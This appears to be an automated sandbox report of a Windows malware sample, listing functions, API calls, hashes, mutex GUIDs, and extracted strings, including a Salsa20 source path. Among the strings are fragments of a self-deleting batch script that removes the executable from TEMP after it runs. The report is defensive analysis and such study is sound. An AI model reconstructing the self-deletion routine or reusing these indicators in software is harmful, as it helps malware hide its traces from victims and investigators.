                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Pointer$Decode$Encode$__lock_doexit
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2158581194-0
                                                                                                                                                                        • Opcode ID: e664eab0a2f8ce3703c552baf369986a84cdf03d3e0bf670d1975cdb5f15a4fc
                                                                                                                                                                        • Instruction ID: e76e354a6dbe61b98edff47a5ef08d68f14e016717c277f9264e8aa4df8f022c
                                                                                                                                                                        • Opcode Fuzzy Hash: e664eab0a2f8ce3703c552baf369986a84cdf03d3e0bf670d1975cdb5f15a4fc
                                                                                                                                                                        • Instruction Fuzzy Hash: F5B012719C430C3BDA113641EC03F553B4C8B80B50F2000B0FA0C1C1E1A9D3F96040C9
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BA2900 Relevance: 1.3, APIs: 1, Instructions: 63COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000010,-000003FF,-000003FF), ref: 00BA2966
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000003.00000002.2361836634.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000003.00000002.2361798189.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2361935877.0000000000C5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2361991946.0000000000C9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362035253.0000000000C9C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CB9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362238587.0000000000CBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_3_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ByteCharMultiWide
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 626452242-0
                                                                                                                                                                        • Opcode ID: 9a5deb156defaeff1be7e6f4494a198a440a1cb00fdfe3dd5a4b32b32ef4f2ac
                                                                                                                                                                        • Instruction ID: 0553d740ec79b7f6fb04500b804209977ba3dcdeeec6c2492bd1c1dd552447d3
                                                                                                                                                                        • Opcode Fuzzy Hash: 9a5deb156defaeff1be7e6f4494a198a440a1cb00fdfe3dd5a4b32b32ef4f2ac
                                                                                                                                                                        • Instruction Fuzzy Hash: F211B171A04219EBDB10DF59CC41BEFBBE8EF05714F004169F819A7280C7BA99158BD6
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Non-executed Functions

                                                                                                                                                                        Function 00BC82A2 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 56COMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • _wcscmp.LIBCMT ref: 00BC82B9
                                                                                                                                                                        • _wcscmp.LIBCMT ref: 00BC82CA
                                                                                                                                                                        • GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002,?,?,00BC8568,?,00000000), ref: 00BC82E6
                                                                                                                                                                        • GetLocaleInfoW.KERNEL32(?,20001004,?,00000002,?,?,00BC8568,?,00000000), ref: 00BC8310
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000003.00000002.2361836634.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000003.00000002.2361798189.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2361935877.0000000000C5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2361991946.0000000000C9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362035253.0000000000C9C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CB9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362238587.0000000000CBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_3_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: InfoLocale_wcscmp
                                                                                                                                                                        • String ID: ACP$OCP
                                                                                                                                                                        • API String ID: 1351282208-711371036
                                                                                                                                                                        • Opcode ID: 2560fde3ad6ba0693194845b10689d3caff6c99ea3439b01ca46514cac92ef51
                                                                                                                                                                        • Instruction ID: af220a9f957c7ab4669ff571d1338565ee1471354171915b10b35af14b5d9b51
                                                                                                                                                                        • Opcode Fuzzy Hash: 2560fde3ad6ba0693194845b10689d3caff6c99ea3439b01ca46514cac92ef51
                                                                                                                                                                        • Instruction Fuzzy Hash: 6D014075204A26ABDB219E58DC89FDA37D8EF05B61F0080A9F504DB091EF70DA80C798
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00B9C070 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 280COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        • e:\doc\my work (c++)\_git\encryption\encryptionwinapi\Salsa20.inl, xrefs: 00B9C090
                                                                                                                                                                        • input != nullptr && output != nullptr, xrefs: 00B9C095
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000003.00000002.2361836634.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000003.00000002.2361798189.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2361935877.0000000000C5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2361991946.0000000000C9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362035253.0000000000C9C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CB9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362238587.0000000000CBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_3_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: __wassert
                                                                                                                                                                        • String ID: e:\doc\my work (c++)\_git\encryption\encryptionwinapi\Salsa20.inl$input != nullptr && output != nullptr
                                                                                                                                                                        • API String ID: 3993402318-1975116136
                                                                                                                                                                        • Opcode ID: 45c58f080f3043b5ef21c1cb3b4c06dfc72e14e9e5d1f61f2ba86ba8ca41510d
                                                                                                                                                                        • Instruction ID: f9419c5b257953f51ebc710c52b9fd8ef98630dac53ca46d658eac7932b2f1c6
                                                                                                                                                                        • Opcode Fuzzy Hash: 45c58f080f3043b5ef21c1cb3b4c06dfc72e14e9e5d1f61f2ba86ba8ca41510d
                                                                                                                                                                        • Instruction Fuzzy Hash: C4C18CB5E002099FCF54CFA9C885ADEFBF1FF48300F24856AE919E7201E334AA558B54
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BA24E0 Relevance: 79.0, APIs: 36, Strings: 9, Instructions: 214synchronizationCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • CreateMutexA.KERNEL32(00000000,00000000,{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}), ref: 00BA24FE
                                                                                                                                                                        • GetLastError.KERNEL32 ref: 00BA2509
                                                                                                                                                                        • CloseHandle.KERNEL32 ref: 00BA251C
                                                                                                                                                                        • CloseHandle.KERNEL32 ref: 00BA2539
                                                                                                                                                                        • CreateMutexA.KERNEL32(00000000,00000000,{FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}), ref: 00BA2550
                                                                                                                                                                        • GetLastError.KERNEL32 ref: 00BA255B
                                                                                                                                                                        • CloseHandle.KERNEL32 ref: 00BA256E
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000003.00000002.2361836634.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000003.00000002.2361798189.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2361935877.0000000000C5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2361991946.0000000000C9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362035253.0000000000C9C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CB9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362238587.0000000000CBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_3_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CloseHandle$CreateErrorLastMutex
                                                                                                                                                                        • String ID: "if exist "$" goto try$@echo off:trydel "$D$TEMP$del "$delself.bat${1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}${FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}
                                                                                                                                                                        • API String ID: 2372642624-488272950
                                                                                                                                                                        • Opcode ID: ad97fe9ded9a3e69714c1a41aafa4cc4e54471e9a91f3a81a26bd0f6e13ee7a4
                                                                                                                                                                        • Instruction ID: fdac842f379589111c7ec5d844147b7be0fb0e0568770eb0e58c8d148fd2b1a7
                                                                                                                                                                        • Opcode Fuzzy Hash: ad97fe9ded9a3e69714c1a41aafa4cc4e54471e9a91f3a81a26bd0f6e13ee7a4
                                                                                                                                                                        • Instruction Fuzzy Hash: 0C714A76940318AFDF109BA4DC89FEE77ACFB44305F1006A6F609E6091DB759A88CF60
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BA1900 Relevance: 29.8, APIs: 16, Strings: 1, Instructions: 95stringmemorywindowCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetLastError.KERNEL32 ref: 00BA1915
                                                                                                                                                                        • FormatMessageW.KERNEL32(00001300,00000000,?,00000400,?,00000000,00000000), ref: 00BA1932
                                                                                                                                                                        • lstrlenW.KERNEL32(?,?,00000400,?,00000000,00000000), ref: 00BA1941
                                                                                                                                                                        • lstrlenW.KERNEL32(?,?,00000400,?,00000000,00000000), ref: 00BA1948
                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000000,?,00000400,?,00000000,00000000), ref: 00BA1956
                                                                                                                                                                        • lstrcpyW.KERNEL32(00000000,?), ref: 00BA1962
                                                                                                                                                                        • lstrcatW.KERNEL32(00000000, failed with error ), ref: 00BA1974
                                                                                                                                                                        • lstrcatW.KERNEL32(00000000,?), ref: 00BA198B
                                                                                                                                                                        • lstrcatW.KERNEL32(00000000,00C90260), ref: 00BA1993
                                                                                                                                                                        • lstrcatW.KERNEL32(00000000,?), ref: 00BA1999
                                                                                                                                                                        • lstrlenW.KERNEL32(00000000,?,00000400,?,00000000,00000000), ref: 00BA19A3
                                                                                                                                                                        • _memset.LIBCMT ref: 00BA19B8
                                                                                                                                                                        • lstrcpynW.KERNEL32(?,00000000,00000400,?,00000400,?,00000000,00000000), ref: 00BA19DC
                                                                                                                                                                          • Part of subcall function 00BA2BA0: lstrlenW.KERNEL32(?), ref: 00BA2BC9
                                                                                                                                                                        • LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000), ref: 00BA1A01
                                                                                                                                                                        • LocalFree.KERNEL32(00000000,?,00000400,?,00000000,00000000), ref: 00BA1A04
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000003.00000002.2361836634.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000003.00000002.2361798189.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2361935877.0000000000C5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2361991946.0000000000C9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362035253.0000000000C9C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CB9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362238587.0000000000CBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_3_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: lstrcatlstrlen$Local$Free$AllocErrorFormatLastMessage_memsetlstrcpylstrcpyn
                                                                                                                                                                        • String ID: failed with error
                                                                                                                                                                        • API String ID: 4182478520-946485432
                                                                                                                                                                        • Opcode ID: fdfca7b307e7d4db885d472694edeac048ec6b8e7e1137bf8a4e51220996082e
                                                                                                                                                                        • Instruction ID: c7857a1aa1a77c8b68f93f7c6caa31748d4ae4544756b2fd447c8f8c62e2413a
                                                                                                                                                                        • Opcode Fuzzy Hash: fdfca7b307e7d4db885d472694edeac048ec6b8e7e1137bf8a4e51220996082e
                                                                                                                                                                        • Instruction Fuzzy Hash: 3A21D835640318BFE7116BA49C89FAF7A78EF85B12F100055FA05B22D0DE741D41DBE5
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00C122E0 Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 127windowCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 00BE49A0: GetModuleHandleA.KERNEL32(FFFFFFFF,?,00000001,?,00BE4B72), ref: 00BE49C7
                                                                                                                                                                          • Part of subcall function 00BE49A0: GetProcAddress.KERNEL32(00000000,_OPENSSL_isservice), ref: 00BE49D7
                                                                                                                                                                          • Part of subcall function 00BE49A0: GetDesktopWindow.USER32 ref: 00BE49FB
                                                                                                                                                                          • Part of subcall function 00BE49A0: GetProcessWindowStation.USER32(?,00BE4B72), ref: 00BE4A01
                                                                                                                                                                          • Part of subcall function 00BE49A0: GetUserObjectInformationW.USER32(00000000,00000002,00000000,00000000,?,?,00BE4B72), ref: 00BE4A1C
                                                                                                                                                                          • Part of subcall function 00BE49A0: GetLastError.KERNEL32(?,00BE4B72), ref: 00BE4A2A
                                                                                                                                                                          • Part of subcall function 00BE49A0: GetUserObjectInformationW.USER32(00000000,00000002,?,?,?,?,00BE4B72), ref: 00BE4A65
                                                                                                                                                                          • Part of subcall function 00BE49A0: _wcsstr.LIBCMT ref: 00BE4A8A
                                                                                                                                                                        • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00C12316
                                                                                                                                                                        • CreateCompatibleDC.GDI32(00000000), ref: 00C12323
                                                                                                                                                                        • GetDeviceCaps.GDI32(00000000,00000008), ref: 00C12338
                                                                                                                                                                        • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00C12341
                                                                                                                                                                        • CreateCompatibleBitmap.GDI32(00000000,?,00000010), ref: 00C1234E
                                                                                                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 00C1235C
                                                                                                                                                                        • GetObjectA.GDI32(00000000,00000018,?), ref: 00C1236E
                                                                                                                                                                        • BitBlt.GDI32(?,00000000,00000000,?,00000010,?,00000000,00000000,00CC0020), ref: 00C123CA
                                                                                                                                                                        • GetBitmapBits.GDI32(?,?,00000000), ref: 00C123D6
                                                                                                                                                                        • SelectObject.GDI32(?,?), ref: 00C12436
                                                                                                                                                                        • DeleteObject.GDI32(00000000), ref: 00C1243D
                                                                                                                                                                        • DeleteDC.GDI32(?), ref: 00C1244A
                                                                                                                                                                        • DeleteDC.GDI32(?), ref: 00C12450
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000003.00000002.2361836634.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000003.00000002.2361798189.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2361935877.0000000000C5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2361991946.0000000000C9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362035253.0000000000C9C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CB9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362238587.0000000000CBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_3_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Object$CreateDelete$BitmapCapsCompatibleDeviceInformationSelectUserWindow$AddressBitsDesktopErrorHandleLastModuleProcProcessStation_wcsstr
                                                                                                                                                                        • String ID: .\crypto\rand\rand_win.c$DISPLAY
                                                                                                                                                                        • API String ID: 151064509-1805842116
                                                                                                                                                                        • Opcode ID: 36b4fff9f139b63d19040c8080eddb21f66ce3bd6f94d696c8afd1ba67db3d21
                                                                                                                                                                        • Instruction ID: 21fd5e90011dca033dc27df1ed4043c29bd3cb0164a69ec04d5b2d0b8bd66d1b
                                                                                                                                                                        • Opcode Fuzzy Hash: 36b4fff9f139b63d19040c8080eddb21f66ce3bd6f94d696c8afd1ba67db3d21
                                                                                                                                                                        • Instruction Fuzzy Hash: 53418375944300AFD3105B759C86F6FBBF8FF8A711F000519FA54A62E1EBB198509BA2
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BF35B0 Relevance: 21.5, APIs: 7, Strings: 5, Instructions: 475COMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000003.00000002.2361836634.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000003.00000002.2361798189.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2361935877.0000000000C5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2361991946.0000000000C9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362035253.0000000000C9C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CB9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362238587.0000000000CBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_3_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _strncmp
                                                                                                                                                                        • String ID: $-----$-----BEGIN $-----END $.\crypto\pem\pem_lib.c
                                                                                                                                                                        • API String ID: 909875538-2733969777
                                                                                                                                                                        • Opcode ID: 654c4cc0b6a079fe87435ede0ba9ad9dcef20fa6cab864c4fd101da8c5bc4156
                                                                                                                                                                        • Instruction ID: 68e8dad617ac53ed1dd0cd441436675d2a0f22fa4b4a7e786e8ab677f5fbd798
                                                                                                                                                                        • Opcode Fuzzy Hash: 654c4cc0b6a079fe87435ede0ba9ad9dcef20fa6cab864c4fd101da8c5bc4156
                                                                                                                                                                        • Instruction Fuzzy Hash: 01F1E7716083456BD721EA64DC42FBBB7D89F54B04F0448A9FA8DD7283E7B4DA088793
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BB5A97 Relevance: 19.6, APIs: 13, Instructions: 84COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000003.00000002.2361836634.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000003.00000002.2361798189.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2361935877.0000000000C5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2361991946.0000000000C9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362035253.0000000000C9C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CB9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362238587.0000000000CBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_3_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _free$__calloc_crt$___freetlocinfo___removelocaleref__calloc_impl__copytlocinfo_nolock__setmbcp_nolock__wsetlocale_nolock
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1503006713-0
                                                                                                                                                                        • Opcode ID: fa085ced43b5654e2a462c9bafaff3ccc85749c76fe9f570ac06cc4a6e3b859b
                                                                                                                                                                        • Instruction ID: dbb26f32a6604b9274beea6f45da0730fb0fc398e0a68e0bc9c33709987c63b6
                                                                                                                                                                        • Opcode Fuzzy Hash: fa085ced43b5654e2a462c9bafaff3ccc85749c76fe9f570ac06cc4a6e3b859b
                                                                                                                                                                        • Instruction Fuzzy Hash: A4219235105A01ABE7327F64DC42FFFBBD4DF51750B2444E9F484650A2EAE19810DBA2
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BE49A0 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 107libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetModuleHandleA.KERNEL32(FFFFFFFF,?,00000001,?,00BE4B72), ref: 00BE49C7
                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,_OPENSSL_isservice), ref: 00BE49D7
                                                                                                                                                                        • GetDesktopWindow.USER32 ref: 00BE49FB
                                                                                                                                                                        • GetProcessWindowStation.USER32(?,00BE4B72), ref: 00BE4A01
                                                                                                                                                                        • GetUserObjectInformationW.USER32(00000000,00000002,00000000,00000000,?,?,00BE4B72), ref: 00BE4A1C
                                                                                                                                                                        • GetLastError.KERNEL32(?,00BE4B72), ref: 00BE4A2A
                                                                                                                                                                        • GetUserObjectInformationW.USER32(00000000,00000002,?,?,?,?,00BE4B72), ref: 00BE4A65
                                                                                                                                                                        • _wcsstr.LIBCMT ref: 00BE4A8A
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000003.00000002.2361836634.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000003.00000002.2361798189.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2361935877.0000000000C5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2361991946.0000000000C9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362035253.0000000000C9C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CB9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362238587.0000000000CBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_3_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: InformationObjectUserWindow$AddressDesktopErrorHandleLastModuleProcProcessStation_wcsstr
                                                                                                                                                                        • String ID: Service-0x$_OPENSSL_isservice
                                                                                                                                                                        • API String ID: 2112994598-1672312481
                                                                                                                                                                        • Opcode ID: b184a37ac7376f3dfd1534dad110d88a5b9f3309d516f863412703ff77ac13ec
                                                                                                                                                                        • Instruction ID: fda63fe9db19cc9b848c4bb9679fcbed98681c3f119f511e9701d0fe40dc5f80
